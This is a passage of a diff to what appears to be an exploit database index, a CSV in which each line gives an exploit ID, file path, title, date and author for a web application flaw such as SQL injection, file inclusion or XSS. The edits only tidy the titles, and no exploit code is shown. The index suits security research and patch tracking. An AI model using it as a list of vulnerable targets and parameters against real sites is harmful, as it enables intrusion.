Inclusion",2010-04-04,ITSecTeam,php,webapps,0 12049,platforms/php/webapps/12049.html,"Uiga Proxy - Remote File Inclusion",2010-04-04,ITSecTeam,php,webapps,0 -12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusion",2010-04-04,cr4wl3r,php,webapps,0 -12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusion",2010-04-04,mat,php,webapps,0 +12050,platforms/php/webapps/12050.txt,"MassMirror Uploader - Multiple Remote File Inclusions",2010-04-04,cr4wl3r,php,webapps,0 +12052,platforms/php/webapps/12052.txt,"SAGU-PRO 1.0 - Multiple Remote File Inclusions",2010-04-04,mat,php,webapps,0 12054,platforms/php/webapps/12054.txt,"Joomla! Component redSHOP 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 12055,platforms/php/webapps/12055.txt,"Joomla! Component redTWITTER 1.0 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 12056,platforms/php/webapps/12056.txt,"Joomla! Component com_wisroyq 1.1 - Local File Inclusion",2010-04-04,NoGe,php,webapps,0 @@ -23583,7 +23584,7 @@ id,file,description,date,author,platform,type,port 12075,platforms/php/webapps/12075.txt,"LionWiki 3.x - 'index.php' Arbitrary File Upload",2010-04-05,ayastar,php,webapps,0 12076,platforms/php/webapps/12076.pl,"ilchClan 1.0.5 - 'cid' SQL Injection",2010-04-05,"Easy Laster",php,webapps,0 12077,platforms/php/webapps/12077.txt,"Joomla! Component News Portal 1.5.x - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 -12078,platforms/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' Parameter SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 +12078,platforms/php/webapps/12078.txt,"Joomla! Component Freestyle FAQ Lite 1.3 - 'faqid' SQL Injection",2010-04-06,"Chip d3 bi0s",php,webapps,0 12082,platforms/php/webapps/12082.txt,"Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12083,platforms/php/webapps/12083.txt,"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12084,platforms/php/webapps/12084.txt,"Joomla! Component Juke Box 1.7 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 @@ -23594,14 +23595,14 @@ id,file,description,date,author,platform,type,port 12089,platforms/php/webapps/12089.txt,"Joomla! Component Appointment 1.5 - Local File Inclusion",2010-04-06,AntiSecurity,php,webapps,0 12092,platforms/hardware/webapps/12092.txt,"McAfee Email Gateway (formerly IronMail) - Cross-Site Scripting",2010-04-06,"Nahuel Grisolia",hardware,webapps,0 12094,platforms/php/webapps/12094.txt,"ShopSystem - SQL Injection",2010-04-06,Valentin,php,webapps,0 -12097,platforms/php/webapps/12097.txt,"Joomla! Component XOBBIX 1.0 - 'prodid' Parameter SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 +12097,platforms/php/webapps/12097.txt,"Joomla! Component XOBBIX 1.0 - 'prodid' SQL Injection",2010-04-06,AntiSecurity,php,webapps,0 12098,platforms/php/webapps/12098.txt,"WordPress Plugin NextGEN Gallery 1.5.1 - Cross-Site Scripting",2010-04-06,"Alejandro Rodriguez",php,webapps,0 12100,platforms/asp/webapps/12100.txt,"Espinas CMS - SQL Injection",2010-04-07,"Pouya Daneshmand",asp,webapps,0 12101,platforms/php/webapps/12101.txt,"Joomla! Component aWiki - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12102,platforms/php/webapps/12102.txt,"Joomla! Component VJDEO 1.0 - Local File Inclusion",2010-04-07,"Angela Zhang",php,webapps,0 12105,platforms/php/webapps/12105.txt,"Free Image & File Hosting - Arbitrary File Upload",2010-04-07,indoushka,php,webapps,0 12106,platforms/php/webapps/12106.txt,"Istgah for Centerhost - Multiple Vulnerabilities",2010-04-07,indoushka,php,webapps,0 -12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusion",2010-04-07,eidelweiss,php,webapps,0 +12107,platforms/php/webapps/12107.txt,"Plume CMS 1.2.4 - Multiple Local File Inclusions",2010-04-07,eidelweiss,php,webapps,0 12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0 12111,platforms/php/webapps/12111.txt,"Joomla! Component com_webeecomment 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (1)",2010-04-08,AntiSecurity,php,webapps,0 @@ -23613,11 +23614,11 @@ id,file,description,date,author,platform,type,port 12123,platforms/php/webapps/12123.txt,"Joomla! Component com_pcchess - Local File Inclusion",2010-04-09,team_elite,php,webapps,0 12124,platforms/php/webapps/12124.txt,"Joomla! Component Huru Helpdesk - SQL Injection (1)",2010-04-09,bumble_be,php,webapps,0 12128,platforms/php/webapps/12128.txt,"GarageSales - Arbitrary File Upload",2010-04-09,saidinh0,php,webapps,0 -12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' Parameter SQL Injection",2010-04-09,v3n0m,php,webapps,0 +12132,platforms/php/webapps/12132.pl,"Joomla! Component Agenda Address Book 1.0.1 - 'id' SQL Injection",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 - Arbitrary File Upload",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS - SQL Injection",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System 7.5 - SQL Injection",2010-04-10,"Easy Laster",php,webapps,0 -12136,platforms/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' Parameter SQL Injection",2010-04-10,c4uR,php,webapps,0 +12136,platforms/php/webapps/12136.txt,"Joomla! Component Real Estate Property 3.1.22-03 - 'aid' SQL Injection",2010-04-10,c4uR,php,webapps,0 12137,platforms/php/webapps/12137.txt,"Joomla! Component allvideos - Blind SQL Injection",2010-04-10,bumble_be,php,webapps,0 12138,platforms/php/webapps/12138.txt,"Joomla! Component com_ca - SQL Injection",2010-04-10,DigitALL,php,webapps,0 12139,platforms/php/webapps/12139.txt,"Kiasabz Article News CMS Magazine - SQL Injection",2010-04-10,indoushka,php,webapps,0 @@ -23625,11 +23626,11 @@ id,file,description,date,author,platform,type,port 12141,platforms/php/webapps/12141.txt,"MediaInSpot CMS - Local File Inclusion (1)",2010-04-11,"Amoo Arash",php,webapps,0 12142,platforms/php/webapps/12142.txt,"Joomla! Component TweetLA 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12143,platforms/php/webapps/12143.txt,"Joomla! Component com_ticketbook - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12144,platforms/php/webapps/12144.txt,"Joomla! Component com_jajobboard - Multiple Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 +12144,platforms/php/webapps/12144.txt,"Joomla! Component com_jajobboard - Multiple Local File Inclusions",2010-04-11,AntiSecurity,php,webapps,0 12145,platforms/php/webapps/12145.txt,"Joomla! Component Jfeedback 1.2 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12146,platforms/php/webapps/12146.txt,"Joomla! Component JProject Manager 1.0 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12147,platforms/php/webapps/12147.txt,"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 -12148,platforms/php/webapps/12148.txt,"Joomla! Component RokModule 1.1 - 'moduleid' Parameter Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 +12148,platforms/php/webapps/12148.txt,"Joomla! Component RokModule 1.1 - 'moduleid' Blind SQL Injection",2010-04-11,AntiSecurity,php,webapps,0 12149,platforms/php/webapps/12149.txt,"Joomla! Component com_spsnewsletter - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12150,platforms/php/webapps/12150.txt,"Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 12151,platforms/php/webapps/12151.txt,"Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion",2010-04-11,AntiSecurity,php,webapps,0 @@ -23655,7 +23656,7 @@ id,file,description,date,author,platform,type,port 12176,platforms/php/webapps/12176.txt,"Joomla! Component Memory Book 1.2 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12178,platforms/php/webapps/12178.txt,"Joomla! Component Digital Diary 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 -12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0 +12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusions",2010-04-12,cr4wl3r,php,webapps,0 12180,platforms/php/webapps/12180.txt,"Joomla! Component com_worldrates - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12181,platforms/php/webapps/12181.txt,"Joomla! Component com_record - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 12182,platforms/php/webapps/12182.txt,"Joomla! Component Sweetykeeper 1.5 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0 @@ -23663,8 +23664,8 @@ id,file,description,date,author,platform,type,port 12184,platforms/php/webapps/12184.txt,"Joomla! Component SermonSpeaker - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0 12185,platforms/php/webapps/12185.txt,"Joomla! Component FLEXIcontent 1.5 - Local File Inclusion",2010-04-12,eidelweiss,php,webapps,0 12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-12,cr4wl3r,php,webapps,0 -12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 -12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0 +12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0 +12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' SQL Injection",2010-04-13,v3n0m,php,webapps,0 12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-13,cr4wl3r,php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-13,cr4wl3r,php,webapps,0 @@ -23696,12 +23697,12 @@ id,file,description,date,author,platform,type,port 12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0 12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0 -12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0 -12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0 +12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' SQL Injection",2010-04-15,v3n0m,php,webapps,0 +12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - 'DOCUMENT_ROOT' Multiple Local File Inclusions",2010-04-15,eidelweiss,php,webapps,0 12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0 12254,platforms/php/webapps/12254.txt,"FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0 12256,platforms/php/webapps/12256.txt,"ilchClan 1.0.5B - SQL Injection",2010-04-16,"Easy Laster",php,webapps,0 -12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' Parameter SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 +12257,platforms/php/webapps/12257.txt,"Joomla! Component com_manager 1.5.3 - 'id' SQL Injection",2010-04-16,"Islam DefenDers Mr.HaMaDa",php,webapps,0 12260,platforms/php/webapps/12260.txt,"SIESTTA 2.0 - Local File Inclusion / Cross-Site Scripting",2010-04-16,JosS,php,webapps,0 12262,platforms/php/webapps/12262.php,"Zyke CMS 1.1 - Authentication Bypass",2010-04-16,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change Username and Password)",2010-04-16,EL-KAHINA,php,webapps,0 @@ -23731,7 +23732,7 @@ id,file,description,date,author,platform,type,port 12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU Facebook 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0 12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0 12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0 -12305,platforms/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 +12305,platforms/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0 12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0 12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Local File Inclusion / Remote File Inclusion) Multiple File Inclusions",2010-04-20,cr4wl3r,php,webapps,0 12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0 @@ -23743,7 +23744,7 @@ id,file,description,date,author,platform,type,port 12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0 12325,platforms/php/webapps/12325.txt,"Joomla! Component com_portfolio - Local File Disclosure",2010-04-21,Mr.tro0oqy,php,webapps,0 12329,platforms/asp/webapps/12329.txt,"CactuShop - User Invoices Persistent Cross-Site Scripting",2010-04-21,7Safe,asp,webapps,0 -12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting",2010-04-21,"Lucas Apa",php,webapps,0 +12330,platforms/php/webapps/12330.txt,"Apache OFBiz - Multiple Cross-Site Scripting Vulnerabilities",2010-04-21,"Lucas Apa",php,webapps,0 12333,platforms/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,php,webapps,0 12338,platforms/php/webapps/12338.txt,"Cacti 0.8.7e - SQL Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 12339,platforms/php/webapps/12339.txt,"Cacti 0.8.7e - OS Command Injection",2010-04-22,"Nahuel Grisolia",php,webapps,0 @@ -23757,7 +23758,7 @@ id,file,description,date,author,platform,type,port 12354,platforms/php/webapps/12354.pl,"NKINFOWEB - SQL Injection",2010-04-23,d4rk-h4ck3r,php,webapps,0 12355,platforms/php/webapps/12355.pl,"Excitemedia CMS - SQL Injection",2010-04-23,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 12358,platforms/php/webapps/12358.txt,"Memorial Web Site Script - Reset Password / Insecure Cookie Handling",2010-04-23,"Chip d3 bi0s",php,webapps,0 -12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete",2010-04-23,"Chip d3 bi0s",php,webapps,0 +12359,platforms/php/webapps/12359.txt,"Memorial Web Site Script - Multiple Arbitrary Delete Vulnerabilities",2010-04-23,"Chip d3 bi0s",php,webapps,0 12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - 'tempid' SQL Injection",2010-04-23,v3n0m,php,webapps,0 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,cr4wl3r,php,webapps,0 @@ -23766,7 +23767,7 @@ id,file,description,date,author,platform,type,port 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion",2010-04-24,eidelweiss,php,webapps,0 12370,platforms/php/webapps/12370.txt,"NCT Jobs Portal Script - Cross-Site Scripting / Authentication Bypass",2010-04-24,Sid3^effects,php,webapps,0 12371,platforms/php/webapps/12371.txt,"WHMCompleteSolution (WHMCS) control (WHMCompleteSolution) - SQL Injection",2010-04-24,"Islam DefenDers",php,webapps,0 -12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' Parameter SQL Injection",2010-04-24,v3n0m,php,webapps,0 +12372,platforms/php/webapps/12372.txt,"Alstrasoft AskMe Pro 2.1 - 'que_id' SQL Injection",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0 @@ -23825,7 +23826,7 @@ id,file,description,date,author,platform,type,port 12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,php,webapps,0 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,php,webapps,0 -12458,platforms/php/webapps/12458.txt,"Scratcher - (SQL Injection / Cross-Site Scripting) Multiple Remote",2010-04-29,cr4wl3r,php,webapps,0 +12458,platforms/php/webapps/12458.txt,"Scratcher - SQL Injection / Cross-Site Scripting",2010-04-29,cr4wl3r,php,webapps,0 12459,platforms/php/webapps/12459.txt,"ec21 clone 3.0 - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12460,platforms/php/webapps/12460.txt,"B2B Gold Script - 'id' SQL Injection",2010-04-30,v3n0m,php,webapps,0 12461,platforms/php/webapps/12461.txt,"JobPost - SQL Injection",2010-04-30,Sid3^effects,php,webapps,0 @@ -23841,7 +23842,7 @@ id,file,description,date,author,platform,type,port 12473,platforms/php/webapps/12473.txt,"Joomla! Component Table JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0 12474,platforms/php/webapps/12474.txt,"Joomla! Component Card View JX - Cross-Site Scripting",2010-05-01,Valentin,php,webapps,0 12475,platforms/php/webapps/12475.txt,"Opencatalogue 1.024 - Local File Inclusion",2010-05-01,cr4wl3r,php,webapps,0 -12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,cr4wl3r,php,webapps,0 +12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusions",2010-05-01,cr4wl3r,php,webapps,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0 12479,platforms/php/webapps/12479.txt,"Joomla! Component com_djClassifieds 0.9.1 - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 12481,platforms/php/webapps/12481.txt,"WHMCompleteSolution (WHMCS) Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 @@ -23884,7 +23885,7 @@ id,file,description,date,author,platform,type,port 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps,0 12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 -12558,platforms/php/webapps/12558.txt,"29o3 CMS - 'LibDir' Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0 +12558,platforms/php/webapps/12558.txt,"29o3 CMS - 'LibDir' Multiple Remote File Inclusions",2010-05-10,eidelweiss,php,webapps,0 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 12561,platforms/php/webapps/12561.txt,"PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections",2010-05-10,R3d-D3V!L,php,webapps,0 12562,platforms/php/webapps/12562.txt,"Waibrasil - Local/Remote File Inclusion",2010-05-10,eXeSoul,php,webapps,0 @@ -23906,7 +23907,7 @@ id,file,description,date,author,platform,type,port 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - 'image_utils.php' Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0 -12590,platforms/php/webapps/12590.txt,"Joomla! Component Komento 1.0.0 - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0 +12590,platforms/php/webapps/12590.txt,"Joomla! Component Komento 1.0.0 - 'sid' SQL Injection",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 12592,platforms/php/webapps/12592.txt,"Joomla! Component aardvertiser 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0 @@ -23969,8 +23970,8 @@ id,file,description,date,author,platform,type,port 12674,platforms/php/webapps/12674.txt,"webYourPhotos 6.05 - 'index.php' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 14341,platforms/php/webapps/14341.html,"Campsite CMS 3.4.0 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0 12676,platforms/php/webapps/12676.txt,"Open-AudIT - Multiple Vulnerabilities",2010-05-21,"Sébastien Duquette",php,webapps,0 -28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - admin/editconfig.php Multiple Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 -28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusion",2006-06-17,"M.Hasran Addahroni",php,webapps,0 +28046,platforms/php/webapps/28046.txt,"dotWidget for articles 2.0 - 'admin/editconfig.php' Multiple Remote File Inclusions",2006-06-03,SwEET-DeViL,php,webapps,0 +28047,platforms/php/webapps/28047.txt,"CMS Faethon 1.3.2 - Multiple Remote File Inclusions",2006-06-17,"M.Hasran Addahroni",php,webapps,0 28048,platforms/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,php,webapps,0 28128,platforms/php/webapps/28128.txt,"CMS Mini 0.2.2 - Multiple Vulnerabilities",2013-09-06,SANTHO,php,webapps,80 12679,platforms/windows/webapps/12679.txt,"3Com* iMC (Intelligent Management Center) - Unauthenticated File Retrieval (Traversal)",2010-05-21,"Richard Brain",windows,webapps,0 @@ -24045,10 +24046,10 @@ id,file,description,date,author,platform,type,port 12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0 12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0 12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0 -12781,platforms/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0 -12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0 +12781,platforms/php/webapps/12781.txt,"Joomla! Component JE Poll - 'pollid' SQL Injection",2010-05-28,v3n0m,php,webapps,0 +12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' SQL Injection",2010-05-28,v3n0m,php,webapps,0 12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0 -12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0 +12786,platforms/windows/webapps/12786.txt,"fusebox - 'ProductList.cfm?CatDisplay' SQL Injection",2010-05-29,Shamus,windows,webapps,0 12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0 12788,platforms/php/webapps/12788.txt,"Marketing Web Design - Multiple Vulnerabilities",2010-05-29,XroGuE,php,webapps,0 12790,platforms/php/webapps/12790.txt,"Nucleus Plugin Twitter - Remote File Inclusion",2010-05-29,AntiSecurity,php,webapps,0 @@ -24121,7 +24122,7 @@ id,file,description,date,author,platform,type,port 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0 13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0 -13776,platforms/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Permanent Cross-Site Scripting",2010-06-08,"Gustavo Sorondo",php,webapps,0 +13776,platforms/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2010-06-08,"Gustavo Sorondo",php,webapps,0 13777,platforms/php/webapps/13777.txt,"Phreebooks 2.0 - Local File Inclusion",2010-06-08,"Gustavo Sorondo",php,webapps,0 13778,platforms/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",php,webapps,0 13779,platforms/php/webapps/13779.txt,"Pre Web Host - SQL Injection",2010-06-08,Mr.Benladen,php,webapps,0 @@ -24140,8 +24141,8 @@ id,file,description,date,author,platform,type,port 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager - SQL Injection",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 13794,platforms/multiple/webapps/13794.txt,"Joomla! Component Jreservation 1.5 - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,multiple,webapps,0 27972,platforms/php/webapps/27972.txt,"ESTsoft InternetDisk - Arbitrary File Upload / Script Execution",2006-06-05,Kil13r,php,webapps,0 -27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - inc/dbase.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 -27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - inc/config.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27973,platforms/php/webapps/27973.txt,"Bookmark4U 2.0 - 'inc/dbase.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 +27974,platforms/php/webapps/27974.txt,"Bookmark4U 2.0 - 'inc/config.php?env[include_prefix]' Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0 13796,platforms/php/webapps/13796.txt,"Joomla! Component com_jstore - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13797,platforms/php/webapps/13797.txt,"Joomla! Component com_jtickets - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13798,platforms/php/webapps/13798.txt,"Joomla! Component com_jcommunity - SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 @@ -24195,7 +24196,7 @@ id,file,description,date,author,platform,type,port 13867,platforms/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,php,webapps,0 